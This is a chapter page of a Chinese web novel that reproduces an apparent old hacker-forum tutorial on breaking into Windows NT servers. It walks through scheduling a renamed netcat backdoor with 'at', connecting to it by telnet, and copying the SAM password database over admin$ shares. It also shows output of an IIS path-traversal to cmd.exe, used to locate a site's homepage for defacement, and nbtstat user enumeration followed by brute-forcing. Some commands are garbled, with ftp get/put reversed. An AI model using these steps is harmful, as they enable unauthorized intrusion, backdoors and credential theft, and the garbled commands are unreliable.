首頁
排行
完本
足跡

八 windows係統(2 / 3)

永遠不說再見 冷可然

????net?user?guest?lovechina

????net命令果然強大啊!

????2:at

????一般一個入侵者入侵後都會留下後門,也就是種木馬了,你把木馬傳了上去,怎麼啟動他呢?

????那麼需要用AT命令,這裏假設你已經登陸了那個服務器。

????你首先要得到對方的時間,

????net?time127.0.0.1

????將會返回一個時間,這裏假設時間為12:1,現在需要新建一個作業,其ID=1

????at127.0.0.1?12:3?nc.exe

????這裏假設了一個木馬,名為NC.EXE,這個東西要在對方服務器上.

????這裏介紹一下NC,NC是NETCAT的簡稱,為了方便輸入,一般會被改名.它是一個TELNET服務,端口為99.

????等到了12:3就可以連接到對方的99端口.這樣就給對方種下了木馬.

????3:telnet

????這個命令非常實用,它可以與遠方做連接,不過正常下需要密碼、用戶,不過你給對方種了木馬,直接連到這個木馬打開的端口.

????telnet?127.0.0.1?99

????這樣就可以連到對方的99端口.那你就可以在對方運行命令了,這個也就是肉雞.

????4:FTP

????它可以將你的東西傳到對方機子上,你可以去申請個支持FTP上傳的空間,國內多的是,如果真的找不到,我給個www.51.NET,不錯的.當我們申請完後,它會給用戶名,密碼,以及FTP服務器.

????在上傳前需要登陸先,這裏我們假設FTP服務器是www.51.NET,用戶名是HUCJS,密碼是654321

????ftp?://www.51.net

????他會要求輸入用戶,成功後會要求輸入密碼.

????下麵先說上傳,假設你需上傳的文件是INDEX.HTM,它位於C:下,傳到對方D:

????get?c:index.htm?d:

????假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下

????put?c:index.htm?d:

????5:copy

????下麵我說說怎樣把本地的文件複製到對方硬盤上去,需要建立好IPC$連接才有效。

????這裏我們把本地C盤下的index.htm複製到127.0.0.1的C盤下

????copy?index.htm127.0.0.1c$index.htm

????如果你要複製到D盤下把C改為D,就行了!

????copy?index.htm127.0.0.1d$index.htm

????如果你要把他複製到WINNT目錄裏

????就要把輸入

????copy?index.htm127.0.0.1admin$index.htm

????admin$是winnt

????要把對方的文件複製過來,順便告訴大家NT的備份的數據庫放在x:winntrepairsam._sam._是數據庫的文件名

????下麵就把127.0.0.1的數據庫複製到本地C盤下

????copy127.0.0.1admin$repairsam._c:

????6:set

????如果你跑進了一部機子,而且想黑他,當然他的80端口要開,不然你黑給誰看。這時需要用SET命令!

????下麵是我得到的結果!我來分析它,隻是找主頁在那而已。

????COMPUTERNAME=PENTIUMII

????ComSpec=D:WINNTsystem32cmd.exe

????CONTENT_LENGTH=0

????GATEWAY_INTERFACE=CGI/1.1

????HTTP_ACCEPT=*/*

????HTTP_ACCEPT_LANGUAGE=zh-cn

????HTTP_CONNECTION=Keep-Alive

????HTTP_HOST=當前登陸者的IP,這裏本來是顯示我的IP,被我刪除了

????HTTP_ACCEPT_ENCODING=gzip,deflate

????HTTP_USER_AGENT=Mozilla/4.0(compatible;MSIE?5.0;Windows?98;DigExt)

????NUMBER_OF_PROCESSORS=1

????Os2LibPath=D:WINNTsystem32os2dll;

????OS=Windows_NT

????Path=D:WINNTsystem32;D:WINNT

????PATHEXT=.COM;.EXE;.BAT;.CMD

????PATH_TRANSLATED=E:vlroot主頁放在的地址,隻要你看到PATH_TRANSLATED=的後麵就是主頁的存放地址。這裏是E:vlroot

????PROCESSOR_ARCHITECTURE=x86

????PROCESSOR_IDENTIFIER=x86?Family?6?Model?3?Stepping?3,GenuineIntel

????PROCESSOR_LEVEL=6

????PROCESSOR_REVISION=0303

????PROMPT=$P$G

????QUERY_STRING=/c+set

????REMOTE_ADDR=XX.XX.XX.XX

????REMOTE_HOST=XX.XX.XX.XX

????REQUEST_METHOD=GET

????SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe

????SERVER_NAME=XX.XX.XX.XX

????SERVER_PORT=80

????SERVER_PORT_SECURE=0

????SERVER_PROTOCOL=HTTP/1.1

????SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0

????SystemDrive=D:

????SystemRoot=D:WINNT

????TZ=GMT-9

????USERPROFILE=D:WINNTProfilesDefault?User

????windir=D:WINNT

????粉紅sè的那行就是對方主頁存放地址,這裏告訴大家一個技巧,很笨的技巧啊,不過隻能用這個方法才能100%的找到主頁的名稱,當你DIR這個目錄時,一定會看到很多文件,你可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文件名,這樣隻要看到和XX.XX.XX.XX看到的也麵一模一樣,那麼這就是主頁的名稱了。

????7:nbtstat

????如果你掃到一部NT的機子,他的136到139其中一個端口開了的話,就要用這個命令得到用戶了。順便告訴大家這是netbios,得到用戶名後就可以猜猜密碼了。例如比較簡單的密碼,密碼和用戶名一樣的,都試下,不行就暴力破解吧!

????現在網上很多NT的機子都開了這些端口的,你可以練習下,我們來分析得到的結果。

????命令是

????nbtstat-A?XX.XX.XX.XX

????-A一定要大寫哦。

????下麵是得到的結果。

????NetBIOS?Remote?Machine?Name?Table

????Name?Type?Status

????Registered?Registered?Registered?Registered?Registered?Registered?Registered?Reg

????istered?Registered?Registered?Registered

????MAC?Address=00-E0-29-14-35-BA

????PENTIUMII〈00〉UNIQUE

????PENTIUMII〈20〉UNIQUE

????ORAHOTOWN〈00〉GROUP

????ORAHOTOWN〈1C〉GROUP

????ORAHOTOWN〈1B〉UNIQUE

????PENTIUMII〈03〉UNIQUE

????INet~Services〈1C〉GROUP

????IS~PENTIUMII...〈00〉UNIQUE

????ORAHOTOWN〈1E〉GROUP

????ORAHOTOWN〈1D〉UNIQUE

????..__MSBROWSE__.〈01〉GROUP

????粉紅sè的就是登陸過這部係統的用戶,可能你不知道怎麼看,大家是不是看到了一竄數字,隻要這竄數字是〈03〉的話,那他前麵的就是用戶。

????這裏的用戶是PENTIUMII。

????找軟件在這裏華軍軟件園://bj2.onlinedown.net/

????找代理在這裏://search.lycos.com.c......source/Free_Proxy_Server/

????://www8.big.or.jp/~000/CyberSyndrome/psr3.html

????找注冊碼在這裏://www.skycn.com/soft/4445.html

????關於認證會員和搜索功能

????簡單說明:

????為了保證服務器的正常工作,現在隻有認證會員才能使用搜索功能。另外,認證會員還有資格進入“永遠的灰sè軌跡”版。要想成為認證會員並不難,但也不簡單。你應該努力提高自己,積極幫助別人,多發有質量的帖子。如果你真心融入論壇大家庭,你得到的將絕不僅僅是一個認證資格。

????相關帖子:

????關於認證問題的討論:://www.sandflee.net/c......um=1&topic=10485&show=352

????關於被入侵

????簡單說明:

????經常有帖子說:“我中xx木馬啦,怎麼辦?”、“我的windows有問題,是不是被入侵啦?”等等。通用的做法是查看可疑進程、注冊表啟動項、服務、開放端口等,然後更新病毒庫,殺毒。前提是你要有一定的電腦常識並對你的係統比較了解,才能分別正常與否。如果你自己對電腦一竅不通,那在論壇別人也很難幫助你。其實就像對付現實中的病毒一樣,應該預防為主。殺毒軟件和網絡防火牆可以抵禦絕大部分危險,自身安全知識的提高則是最根本的保障。最新的病毒相關知識可以到殺毒軟件公司的主頁上找。另外,係統不正常也可能是cāo作失誤引起的。這裏是“黑客零起點”不是“電腦零起點”,所以關於係統修複的問題,請不要在論壇提了。

????相關工具:

????Active?Ports監視自己電腦的端口://www.isgrey.com/down/show.asp?id=215&down=1

上一頁 書頁/目錄 下一頁